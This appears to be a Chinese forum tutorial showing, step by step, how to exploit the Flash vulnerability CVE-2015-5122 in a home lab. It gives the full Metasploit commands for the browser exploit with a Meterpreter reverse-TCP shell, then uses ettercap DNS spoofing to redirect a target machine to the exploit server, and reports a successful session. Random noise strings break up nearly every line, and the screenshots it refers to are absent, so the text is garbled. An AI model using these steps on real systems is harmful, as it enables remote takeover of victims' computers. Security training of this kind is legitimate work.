1 F* i6 `+ ]) z- w( f+ I4 }, H9 K
二、cve2015-5122漏洞实例演示虚拟机 % R, {/ A" j# P6 g4 y$ f0 ]/ ~
' I! V9 r$ R2 D7 P
; A5 ]2 |0 S. N0 c3 k 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
1 ~* \1 F1 q' a/ c7 y 9 p2 N6 w- A- N+ ?. l1 A
. G5 d' C' u! M. K2 S0 q
search cve-2015-5122如图: 2 g( S7 I0 X+ C8 N( G- Z
3 N1 f5 J4 i k/ W
[+ W' P2 b3 `' g+ @: O! v
# c x, M! h% l" T, M) e
5 P9 f# }1 x2 g- n, ?, w7 v9 b9 h1 S9 P5 D M
下面我们敲如下命令: % } p h& p3 R1 ^
. K" J+ N6 [2 v$ a
) ?3 l$ z" K; v4 z5 @& a use exploit/multi/browser/adobe_flash_opaque_background_uaf - r3 l2 k1 {& ]: @3 f
* u4 }$ H% d0 W
# c" D$ [6 |! H, ^ set PAYLOAD windows/meterpreter/reverse_tcp . i5 u9 F7 z. b5 i' S9 g
6 c% }# H+ }% [5 l! s3 O# T$ |9 v" ]: }, D' |% J) C' E
set LHOST 192.168.0.109 $ J' S& B: Z% A* l2 \7 W
) f0 s7 D2 S `8 E$ C, }' p
+ Y7 |1 m: @, z0 P8 ^* F0 M. U$ b2 X set URIPATH / /*根目录*/ + f, @ s6 F% L9 ]" Q
7 T7 s: f4 x4 p' C6 t T) ~0 _7 e: j: E& S
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 3 J5 A, k7 |% u) w# X
. F7 l9 S0 E7 p+ q) E/ e
Y) {0 _: s. F. A
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ( q L0 a2 o+ c1 {+ }# G/ t1 P
* ?& S" P4 ^3 ?
4 n% ?# W) A) U" V+ P( w/ ^ 然后show options如图: 9 d2 x5 p8 U$ E% z! Y! z
; ~1 G* v' O4 a
9 s4 b! U- z; J
. c8 p+ R) O$ J( x9 R, F4 Q7 O
; F1 z. D1 X! D8 K! G L- b6 f3 m% v: j
0 v0 t3 r+ Y2 t, G7 { 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: . v& j# V% E/ G- o8 g
6 u4 u( F6 ?" r. f& p# x. l1 x) u & G& K3 d" ~) A
8 n7 Q6 E( |! W- i5 b' V 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
! Z; a- W: n4 J; y+ G
$ e0 }! B5 I0 ~- Y/ ]# R1 |. y% Q5 O4 n4 p
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
0 x& s; U5 q* X + _2 @6 @, G' @
) c4 J% b) C: R5 l. }+ [, E
6 {8 ~2 }/ w5 |; @' }: m
9 x+ V/ \8 m+ F) E
% M' V, F, I; n. p# J% S 成功了,这时候我们断开ettercap,如图: / w! }/ }! [$ g4 j& x
0 C6 s* Q) Z# T8 s. x' q) u! p2 R- W) u2 W8 J
: j1 l; m* v1 h. n% r6 L) z2 R( Q ' X+ J1 l3 c M6 y3 x& G
. e5 W3 ]3 u* u& _7 E0 y. K Screenshot如图: & V4 W3 O* s& B" D/ u: K: p
1 I( a, |! b5 F# m J+ H% W: F7 ^5 w8 G
: Y( c& B. h: \6 M, s
. d; J" T C( a9 D3 M7 f v4 a( I- |# i" t8 H! D
; j( ^& Q9 M% F: L" R! r/ o
|